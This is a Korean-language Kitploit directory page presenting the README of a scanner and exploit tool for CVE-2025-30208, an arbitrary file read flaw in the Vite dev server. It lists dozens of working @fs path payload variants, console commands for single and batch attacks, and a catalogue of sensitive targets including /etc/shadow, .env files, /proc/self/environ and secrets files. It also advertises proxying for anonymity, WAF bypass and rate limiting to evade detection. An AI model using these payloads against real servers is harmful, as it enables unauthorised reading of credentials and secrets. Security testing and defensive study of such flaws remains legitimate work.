Skip to content
KitploitKITPLOIT
도구블로그
Log in
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-30208 — CVE‑2025‑30208는 인기 있는 프론트엔드 빌드 도구인 Vite 개발 서버에서 발생하는 중간 심각도의 임의 파일 읽기 취약점입니다. | Kitploit
도구/GitHubGitHub/th-secforge/cve-2025-30208
ReconnaissanceVulnerability ScannersExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubth-secforge/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208는 인기 있는 프론트엔드 빌드 도구인 Vite 개발 서버에서 발생하는 중간 심각도의 임의 파일 읽기 취약점입니다.

저장소 보기
1441년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🔥 CVE-2025-30208 Vite 임의 파일 읽기 취약점 스캐너

Python License Security Status Modular

엔터프라이즈급 기능을 갖춘 CVE-2025-30208 고급 취약점 스캐너

Vite 임의 파일 읽기 취약점 탐지를 위한 전문 침투 테스트 도구

🚀 빠른 시작 • 📋 기능 • 🔧 사용법 • 📊 예제 • 🛡️ 보안


📖 개요

이것은 Vite 개발 서버에서 CVE-2025-30208 취약점을 탐지하고 악용하도록 설계된 포괄적인 취약점 스캐너입니다. 이 취약점은 Vite의 파일 시스템 엔드포인트를 통해 임의 파일 읽기 액세스를 허용하여, 민감한 설정 파일, 소스 코드 및 시스템 정보를 잠재적으로 노출시킬 수 있습니다.

🎯 이 도구가 하는 일

  • 네트워크 전체에서 취약한 Vite 인스턴스를 탐지합니다.
  • 임의 파일 읽기 취약점을 안전하게 악용합니다.
  • 민감한 파일 및 설정 데이터를 발견합니다.
  • 여러 형식(HTML, JSON, 콘솔)으로 결과를 보고합니다.
  • 스캔 세션 및 설정을 관리합니다.
  • 자동 재시도 메커니즘으로 오류를 우아하게 처리합니다.

🏗️ 모듈식 아키텍처

이 도구는 이제 더 나은 유지보수성과 확장성을 위한 모듈식 아키텍처를 갖추고 있습니다:

  • CVE-2025-30208.py - 메인 스캐너 애플리케이션
  • payloads.py - 고급 익스플로잇 페이로드 (60개 이상 변형)
  • sensitive_files.py - 포괄적인 민감 파일 데이터베이스 (200개 이상 파일)
  • html_template.py - 향상된 해커 스타일 HTML 보고 템플릿

🚀 빠른 시작

전제 조건

pip3 install -r requirements.txt

기본 사용법

python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 기능

🔍 핵심 취약점 탐지

  • 60개 이상의 고급 페이로드: 최대 탐지를 위한 포괄적인 익스플로잇 기술
  • 스마트 탐지: 오탐을 피하기 위한 지능형 응답 분석
  • 실시간 검증: 대상 응답의 지속적인 검증
  • 종합 테스트: 알려진 모든 취약 엔드포인트 테스트

🛡️ 향상된 보안 기능

  • 프록시 지원: 익명성을 위한 HTTP/HTTPS 프록시 설정
  • 사용자 정의 헤더: 사용자 정의 HTTP 헤더로 WAF/IPS 우회
  • 속도 제한: 탐지를 피하기 위한 설정 가능한 지연
  • 세션 관리: 스캔 세션 저장 및 복원
  • 입력 검증: 포괄적인 매개변수 검증

🔧 고급 기능

  • 일괄 스캔: 여러 대상의 멀티스레드 스캔
  • 민감 파일 검색: 200개 이상의 민감 파일 자동 검색
  • 연결성 테스트: TCP/UDP/HTTP/HTTPS 프로토콜 테스트
  • 오류 복구: 지수 백오프를 이용한 자동 재시도
  • 종합 로깅: 타임스탬프가 포함된 상세 로그

📊 보고 및 출력

  • 🎨 향상된 HTML 보고서: 애니메이션이 포함된 아름다운 해커 스타일 취약점 보고서
  • JSON 내보내기: 추가 분석을 위한 구조화된 데이터
  • 콘솔 출력: 색상 코드로 실시간 피드백
  • 로그 파일: 상세 감사 추적
  • 대화형 웹 인터페이스: 보고서 보기를 위한 내장 웹 서버

🔧 사용법 가이드

1. 기본 설정

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. 취약점 테스트

CVE-2025-30208 > run

# 상세 출력을 위해 상세 모드 활성화
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. 일괄 스캔

CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[두 번 Enter를 눌러 종료]

4. 민감 파일 검색

CVE-2025-30208 > scan

5. 고급 설정

# 프록시 설정
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080

# 사용자 정의 헤더 설정
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}

# 속도 제한 설정
CVE-2025-30208 > rate
Enter rate limit: 1.0

6. 향상된 HTML 보고

# 아름다운 HTML 보고서 생성
CVE-2025-30208 > pull

# 보고서 보기를 위한 웹 서버 시작
CVE-2025-30208 > web

# 특정 포트에서 웹 서버 시작
CVE-2025-30208 > web 8081

# 웹 서버 중지
CVE-2025-30208 > web off

📊 명령 참조

명령어설명예시
set <옵션> <값>설정 옵션 지정set RHOST 192.168.1.100
show options현재 설정 표시show options
edit대화형 옵션 편집기edit
run / exploit취약점 테스트 실행run
batch여러 대상 일괄 스캔batch
scan민감 파일 검색scan
pull결과를 HTML/JSON으로 내보내기pull
web [on|off|port]HTML 보고서용 웹 서버web 8080
save세션 설정 저장save
load세션 설정 불러오기load
test대상 연결성 테스트test
validate현재 설정 검증validate
verbose상세 모드 전환verbose
proxy프록시 설정 구성proxy
headers사용자 정의 HTTP 헤더 설정headers
rate속도 제한 구성rate
log로깅 정보 표시log
help / ?도움말 표시help
exit / quit도구 종료exit

⚙️ 설정 옵션

옵션설명기본값검증
RHOST대상 호스트/IP 주소-호스트명/IP 검증
RPORT대상 포트 번호-포트 범위 (1-65535)
FILEPATH테스트할 파일 경로etc/passwd경로 검증
PROXYHTTP/HTTPS 프록시 URL-URL 형식 검증
VERBOSE상세 출력 활성화false불리언 검증
RATE_LIMIT요청 간 지연 (초)0.3숫자 검증
THREADS일괄 스캔 스레드 수5정수 검증
TIMEOUT요청 시간 초과 (초)5정수 검증
CUSTOM_HEADERS사용자 정의 HTTP 헤더 (JSON){}JSON 형식 검증

🎨 향상된 페이로드 시스템

이제 스캐너는 payloads.py에 구성된 60개 이상의 다양한 페이로드 변형을 사용합니다:

기본 @fs 페이로드

/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url

확장된 매개변수 변형

/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8

Vite 특정 변형

/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug

모듈 시스템 변형

/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html

대체 엔드포인트

/app/{file_path}?raw??
/App/{file_path}?raw??

🔍 향상된 민감 파일 검색

이제 도구는 sensitive_files.py에 구성된 200개 이상의 민감 파일을 테스트합니다:

🖥️ 시스템 파일 (Linux/Unix)

  • /etc/passwd - 사용자 계정 정보
  • /etc/shadow - 암호화된 비밀번호 데이터
  • /etc/services - 네트워크 서비스
  • /etc/hosts - 호스트 이름 매핑
  • /etc/fstab - 파일 시스템 테이블
  • /etc/ssh/sshd_config - SSH 서버 설정
  • /etc/crontab - 시스템 cron 작업
  • /etc/sudoers - Sudo 설정

📊 프로세스 정보

  • /proc/version - 커널 버전
  • /proc/cpuinfo - CPU 정보
  • /proc/meminfo - 메모리 정보
  • /proc/self/environ - 프로세스 환경
  • /proc/self/cmdline - 프로세스 명령줄
  • /proc/net/tcp - TCP 연결
  • /proc/net/udp - UDP 연결

⚙️ 애플리케이션 설정

  • .env - 환경 변수
  • .env.local - 로컬 환경
  • .env.production - 프로덕션 환경
  • config.json - 애플리케이션 설정
  • settings.json - 애플리케이션 설정
  • application.properties - Spring 설정
  • application.yml - YAML 설정
  • database.yml - 데이터베이스 설정
  • secrets.json - 비밀 관리

📦 Node.js / JavaScript 파일

  • package.json - Node.js 종속성
  • package-lock.json - 잠긴 종속성
  • yarn.lock - Yarn 잠금 파일
  • vite.config.js - Vite 설정
  • vite.config.ts - TypeScript Vite 설정
  • tsconfig.json - TypeScript 설정
  • webpack.config.js - Webpack 설정
  • next.config.js - Next.js 설정
  • nuxt.config.js - Nuxt.js 설정
  • angular.json - Angular 설정
  • vue.config.js - Vue.js 설정
  • rollup.config.js - Rollup 설정
  • eslint.config.js - ESLint 설정
  • prettier.config.js - Prettier 설정
  • jest.config.js - Jest 설정
  • babel.config.js - Babel 설정
  • tailwind.config.js - Tailwind CSS 설정

🔧 Git 파일

  • .git/config - Git 설정
  • .gitignore - Git 무시 규칙
  • .gitattributes - Git 속성
  • .gitmodules - Git 서브모듈
  • .git/HEAD - 현재 브랜치
  • .git/logs/HEAD - Git 로그
  • .git/refs/heads/master - Master 브랜치
  • .git/refs/heads/main - Main 브랜치

📚 문서 파일

  • README.md - 프로젝트 문서
  • CHANGELOG.md - 변경 로그
  • LICENSE - 라이선스 정보
  • CONTRIBUTING.md - 기여 가이드라인
  • AUTHORS - 작성자 정보
  • TODO.md - 할 일 목록
  • ROADMAP.md - 개발 로드맵

🐳 Docker 파일

  • Dockerfile - Docker 설정
  • docker-compose.yml - Docker Compose
  • docker-compose.override.yml - 재정의 설정
  • .dockerignore - Docker 무시 규칙
  • docker-compose.prod.yml - 프로덕션 설정
  • docker-compose.dev.yml - 개발 설정

🌐 웹 서버 설정

  • nginx.conf - Nginx 설정
  • apache2.conf - Apache 설정
  • httpd.conf - HTTP 데몬 설정
  • .htaccess - Apache 접근 제어
  • web.config - IIS 설정
  • robots.txt - 검색 엔진 지시어
  • sitemap.xml - 사이트 구조
  • manifest.json - 웹 앱 매니페스트
  • sw.js - 서비스 워커
  • firebase.json - Firebase 설정
  • firebase.rules - Firebase 보안 규칙
도구 다운로드